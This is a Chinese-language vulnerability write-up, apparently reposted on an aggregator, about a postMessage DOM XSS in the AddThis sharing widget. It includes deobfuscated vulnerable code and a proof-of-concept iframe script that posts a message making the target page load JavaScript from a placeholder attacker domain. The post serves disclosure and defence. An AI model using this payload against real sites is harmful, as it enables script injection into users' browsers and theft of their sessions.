Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all articles
Browse latest Browse all 12749

PostMessage XSS On AddThis

December 16, 2016, 4:37 am
$
0
0
前言

在测试一个使用AddThis的网站的时候,通过Chrome的开发者工具,我发现它使用了PostMessage


PostMessage XSS On AddThis

我在Chrome开发者工具的listener中设置了一个断点,然后发送了一个消息“window.postMessage("hello", "*")“。用来检测是否存在漏洞

检查listener

代码除了使用HTTP和HTTPS的页面以外并没有进行orgin检查。消息的预期格式参见代码第5364行:

at-share-bookmarklet:DATA.
PostMessage XSS On AddThis

继续调试,然后发送正确格式的消息,使得代码最终在5370行调用了“r”函数。而“ r”函数调用另一个名为“ s”的函数:


PostMessage XSS On AddThis

S函数创建了一个新的元素(DOM XSS?)


PostMessage XSS On AddThis
反混淆

为了理解这个函数到底干了什么,我通过命名变量和删除多行语句来反混淆:

e.exports = function(messageData, t, n, s, u, isTrue) { if (!o[messageData] || isTrue) { //isTrue is 1 (true) when this function is called. var scriptTag = document.createElement("script"); if("https:" === window.location.protocol){ var isSecurePage = true; }else{ var isSecurePage = false; } var protocol = ""; var headElement = document.getElementsByTagName("head")[0]; scriptTag.setAttribute("type", "text/javascript"); scriptTag.setAttribute("async", "async"); //Check if user is using Chrome/Safari if(window.chrome && window.chrome.self || window.safari && window.safari.extension){ if(isSecurePage){ protocol = "https"; }else{ protocol = "http"; } //If the message data starts with "//", add protocol before if(0 === messageData.indexOf("//")){ messageData = protocol + messageData; } } //If the message data starts with "//" if(0 === messageData.indexOf("//")){ scriptTag.src = messageData; }else{ scriptTag.src = protocol + "//s7.addthis.com/" + messageData; } headElement.insertBefore(scriptTag, headElement.firstChild); o[messageData] = 1; return scriptTag; } return 1; }

最终得到发送格式如下的消息:

at-share-bookmarklet://ATTACKERHOST/xss.js

它会添加一个新的脚本元素到“//ATTACKERDOMAIN/xss.js”的页面。也就是说存在DOM XSS漏洞。

PoC

攻击者能够攻击任何使用了AddThis的网站(DOM XSS)。Exploit如下:

<iframe id="frame" src="https://targetpage/using_addthis"></iframe> <script> document.getElementById("frame").postMessage('at-share-bookmarklet://ATTACKERDOMAIN/xss.js', '*'); </script> 总结

这个漏洞是出自于框架中,所以所有调用PostMessage开发的应用都将受到这个漏洞的影响。PostMessage经常是导致DOM XSS漏洞的源头。如果你使用了第三方脚本,一定要检查它们的PostMessage实现。

参考

PostMessage

API的缺陷: https://labs.detectify.com/2016/12/08/the-pitfalls-of-postmessage/

Search
Viewing all articles
Browse latest Browse all 12749

Trending Articles

【日语无字】春之钟.Haru.no.kane.1985.JAP.vhsrip.NoSub.by.xiongzaixia&vivi

May 5, 2017, 9:42 pm

101(2)教師專業社群發表會~語、數、社、綜、藝,長安教師專業第一

May 13, 2013, 12:42 am

萬美玲、呂玉玲批經濟部為SRF開後門 籲別受美方壓力

September 27, 2024, 3:18 am

Cocos creator 3.4 Tween动画实现变复杂问题

May 27, 2022, 8:41 pm

達方建設 牧容建案系列

October 8, 2021, 11:04 pm

求大神帮我看看,新买的cz880 smart警报,这是什么情况?

July 20, 2017, 5:15 am

UUP版Win11 24H2 x64 26100.1301(RP)

July 31, 2024, 7:23 am

去水丸可以減肥嗎?

April 17, 2015, 4:26 am

35岁了,还被我爸骂我SB (豆瓣 Anti-Parents 父母皆祸害小组)

September 12, 2016, 7:38 pm

方易通7862 CarLink CarPlay 導航音樂變小聲 請益

February 22, 2022, 11:16 pm

黄采仪生日含「口球」床战10小时 全身瘫软流口水喊:此生难忘

September 11, 2018, 7:06 am

漫画「魔力充电娘」完结 最终卷第10卷同捆蓝光特典

January 8, 2014, 12:50 am

《沈冰自述——我和周永康的故事》全本

February 8, 2015, 9:08 pm

iOS 上使用 Onion Browser 访问 Tor 网络

September 27, 2016, 7:26 pm

福斯VW T5/T6 CAREVLLLE 車內冷氣濾網更換公開

July 4, 2018, 5:29 am

SVN源代码泄露利用工具 SvnExploit升级版

December 1, 2018, 7:54 pm

出售: Rip 碟神器 Pioneer S11J-X + RATOC RP-EC5-U3AI

February 25, 2020, 4:41 am

df-dferh-01 中国区 Android 安装 Google Play Store 后报错 的 解决办法

April 24, 2019, 6:56 am

[转载]煞貢、直星、人專吉日\金神七煞歌

March 3, 2016, 6:37 am

[出售] 現金美西普通 ▓☞金門暗黑館☜▓ 各式D2裝備 應有盡有 【優良商家】

November 20, 2018, 2:26 am
Search